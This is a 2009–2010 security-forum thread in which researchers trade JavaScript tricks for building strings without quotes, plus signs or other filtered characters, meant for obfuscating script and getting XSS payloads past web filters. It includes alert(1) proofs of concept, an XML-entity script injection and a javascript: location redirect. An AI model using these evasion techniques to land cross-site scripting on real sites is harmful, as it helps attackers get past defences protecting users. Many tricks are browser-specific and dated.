Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
String hacks (ways to make a string)
Posted by: sirdarckcat
Date: June 08, 2009 02:14AM

//(look for the authors here: http://sla.ckers.org/forum/read.php?2,15812,page=1)
// Moar: Code Obfuscation Algorithms

// javascript

From native strings

(undefined='alert(1)',eval(typeof x));

Using base conversion

490837..toString(1<<5)

E4X morphs

eval(<>&#34;&#111;&#98;&#102;&#117;&#115;&#99;&#97;&#116;&#101;&#100;&#34;</>+[]) // ff only
eval(<>&#x22;&#x6f;&#x62;&#x66;&#x75;&#x73;&#x63;&#x61;&#x74;&#x65;&#x64;&#x22;</>+[]) // ff only
[]+<_>e</_>+<s>v</s>+<z>a</z>+<e44444444>l</e44444444>;// ff only
<>this is my multi-line text </>.toString(); // ff only
<><_ x="alert">s</_></>..@x+[]// ff only

RegExp morphs

eval(unescape(/%22%6f%62%66%75%73%63%61%74%65%64%22/.source))
/I am a string/[-1];
/XSS/.source;
String(/Test/).substr(1,4) ;
uneval(/eval/).replace(/\//g, [ ] );// not ie
String(/http:/+/www.website.com/+(/x/+[])[1]+(/m/+[])[1]+(/l/+[])[1]+(/#/+[])[1]).slice(1);//to create URIs
((x=/(<scr).*(ipt>)/).test(x));(RegExp.$1+RegExp.$2);

toString morphs

['I am a string'];//Array converted when toString method called
Array('I am a string');
new Array('I am a string');

Base64 morphs

atob('amF2YXNjcmlwdDphbGVydCgxKQ');// ff only
btoa("\x7a\xf6\xa5");// ff only

\ escaping

(b='\\',s='\'',o='0',eval(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s));
"\145\166\141\154";//oct ("a".charCodeAt().toString(8))
"\x65\x76\x61\x6c";//hex (can also use \X)
"\u0065\u0076\u0061\u006c";//unicode
eval(String.fromCharCode(34,111,98,102,117,115,99,97,116,101,100,34))

Code Sequences

for(str in {AnyString:0});alert(str);
for each(obj in {e:{}})for each(obj[<>{<>al</>}{<>ert(1)</>}</>] in {z:0})for(x in obj);eval(x);/* without ' , " , \ , % , + , - , *, = , "," , "." */

html/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html [<!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">]>
<html xmlns="http://www.w3.org/1999/xhtml">&inject;</html>

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 13 time(s). Last edit at 06/16/2009 03:39AM by sirdarckcat.

Re: String hacks (ways to make a string)
Posted by: backbone
Date: June 14, 2009 03:40PM

['string']
window['String']['fromCharCode'](115,116,114,105,110,103)
{a:'string'}

---
blog [-] microblog

Re: String hacks (ways to make a string)
Posted by: hoshikuzu
Date: June 16, 2009 01:38AM

for (foo in {bar:0}){} // foo = "bar"
alert(foo); // alerts "bar"
alert(typeof foo) // alerts "string"



Edited 1 time(s). Last edit at 06/16/2009 01:43AM by hoshikuzu.

Re: String hacks (ways to make a string)
Posted by: hoshikuzu
Date: June 16, 2009 01:42AM

for each ( obj in {e:{}}){
for each ( obj[<>{<>al</>}{<>ert(1)</>}</>] in {z:0}){
for (x in obj){
}
}
}

alert(x) // alerts "alert(1)"
alert (typeof x) //alerts "string"

/* without ' , " , \ , % , + , - , *, = , "," , "." */



edit by sdc:
k, added as code sequences.. Greetz!!



Edited 7 time(s). Last edit at 06/16/2009 03:41AM by sirdarckcat.

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 02, 2009 08:15AM

/ale/(/ale/)+/rt/(/rt/)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: String hacks (ways to make a string)
Posted by: tx
Date: September 02, 2009 12:26PM

/alert/()[0]

-tx @ lowtech-labs.org

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 02, 2009 01:21PM

@tx

I tried that one but it didn't work for me. Which browser were you testing?

Re: String hacks (ways to make a string)
Posted by: tx
Date: September 02, 2009 03:49PM

@Gareth: FF 3.5.2, I originally tested in the Firebug console, but it works fine for me from an html document as well:

<html>
  <head>
  <title></title>
  </head>
  <body>
  <script>
  alert(/alert/()[0] + ' : '+typeof /alert/()[0]);
  </script>
  </body>
</html>

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 02, 2009 04:10PM

@tx

Weird, I'm using FF3.5.2 but I get errors: no input for alert.

Re: String hacks (ways to make a string)
Posted by: tx
Date: September 02, 2009 05:31PM

@Gareth: You're right. I'm seeing some inconsistent behavior. I've been able to reproduce that error sometimes but not others. I think it's related to Firebug actually, but I'm not quite sure how yet.

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 02:34AM

@tx

I wonder if it's because you did it in the console first? Maybe Firebug is caching the call to the RegExp

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 02:40AM

Awesome technique by hoshikuzu which allows you to get individual letters:-
/[^][^][^][^][^]([^])/(~[]/[])

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 03:42AM

LOL

eval(/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[1]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[2]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[3]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[4]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[5]+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^][^])/(/xaxlxexrxtx(1)/)[6]+1+/[^][^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])[^]([^])/(/xaxlxexrxtx(1)/)[7])

Re: String hacks (ways to make a string)
Posted by: Matt Presson
Date: September 03, 2009 08:56AM

@Gareth

Please explain a little


-Matt

Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: September 03, 2009 09:04AM

/[^]/ is matching one character - basically any character ([^a] = all but a -> [^] all but nothing). Then again you can use /foo/() as a shortcut for match - which explains why /foo/(/bar/) works.

Re: String hacks (ways to make a string)
Posted by: sirdarckcat
Date: September 03, 2009 09:06AM

Explanation:

/\w+\W\w+\W/(/alert(1)/)

Greetz!!

Re: String hacks (ways to make a string)
Posted by: Matt Presson
Date: September 03, 2009 09:34AM

Got it now. What was confusing is that JavaScript is returning an array due to the capturing groups used within the regex.


-Matt

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 03, 2009 10:22AM

Yeah you got it :)

btw here is how I found it....

I was reading Secrets of the Javascript Ninja and it reminded me that a RegExp was defined as a function in FF2. So I tried to execute one in HV. I passed some strings to it and noticed it was an array when I hit "inspect" :) Then I tried RegExps instead of passing it strings and to my delight it worked haha




Edited 1 time(s). Last edit at 09/03/2009 10:22AM by Gareth Heyes.

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 14, 2009 03:31AM

hehe

<>//{x='alert(1)'}//</>;eval(x)

http://james.padolsey.com/javascript/javascript-comment-removal-revisted/

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: September 16, 2009 10:26AM

IE only:-

window['locat'+/'/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii.options+'on']='javascript:alert(1)'

/;/iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiimmmmmmmmmmmmmmmmmmmmmmmgggggggggggggg.options=='igm'

Re: String hacks (ways to make a string)
Posted by: sirdarckcat
Date: September 16, 2009 11:31AM

haha..

Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: September 16, 2009 04:49PM

It's t(ea) time /./gimmi(!!1)

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: January 11, 2010 08:35AM

More e4x string hacks:-

<a>test</a>.*
<>test</>[0]
<>he<!---->he</>
<a>he<![CDATA[ haha ]]>he</a>
<>/*{'he'+/*abc*/'he'}*/</>
new Namespace('ha','ha')[-1]+new Namespace('ha','ha')[-1]
x=new Namespace('ha','ha');x[-1]+x[-2]
new Namespace('haha').uri
new Namespace('haha','haha').prefix
new QName('haha').localName
new QName('haha','haha').uri
new QName('ha','ha')[-1]+new QName('ha','ha')[-2]
<>ha</>+<>ha</>
x=new Namespace("x");y=<x xmlns:x="x" x:x="haha"></x>;y.@x::x
'ha'+<?eh wtf is going on ff?>+'ha'

endeth my e4x hacking investigation




Edited 12 time(s). Last edit at 01/11/2010 09:44AM by Gareth Heyes.

Re: String hacks (ways to make a string)
Posted by: rvdh
Date: January 12, 2010 06:45AM

Nice Gaz. That E4X is crazy stuff.

Re: String hacks (ways to make a string)
Posted by: Gareth Heyes
Date: January 12, 2010 08:05AM

@rvdh

yeah nuts :)

Re: String hacks (ways to make a string)
Posted by: tr3w
Date: June 18, 2010 01:58PM

String concatenation without quotes and addition signs:

eval([<>ale</>,<>rt(1)</>][<>join</>]([])) // only firefox



Edited 1 time(s). Last edit at 06/18/2010 02:10PM by tr3w.

Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: June 18, 2010 04:08PM

@tr3w the comma can be omitted too

eval((<_><_>ale</_><_>rt(1)</_></_>._.*).split()[0])

Re: String hacks (ways to make a string)
Posted by: tr3w
Date: June 18, 2010 06:49PM

@.mario oh right, thanks, and dots can also be avoided, heh, maybe it's very impractical

eval((<_><_>ale</_><_>rt(1)</_></_>[<>_</>][<>*</>])[/concat/[<>source</>]]())

Re: String hacks (ways to make a string)
Posted by: Anonymous User
Date: June 19, 2010 07:57AM

@tr3w depends - often there are more use cases for heavily limited character ranges than one might think ;)

Re: String hacks (ways to make a string)
Posted by: tr3w
Date: June 20, 2010 01:33AM

A dirty little trick to make strings out of unreadable characters:

atob(['jm','f67','ipwM','M)','r','t(1+M']['map'](btoa)['join']([])['replace'](/[0A=]/g,[]))
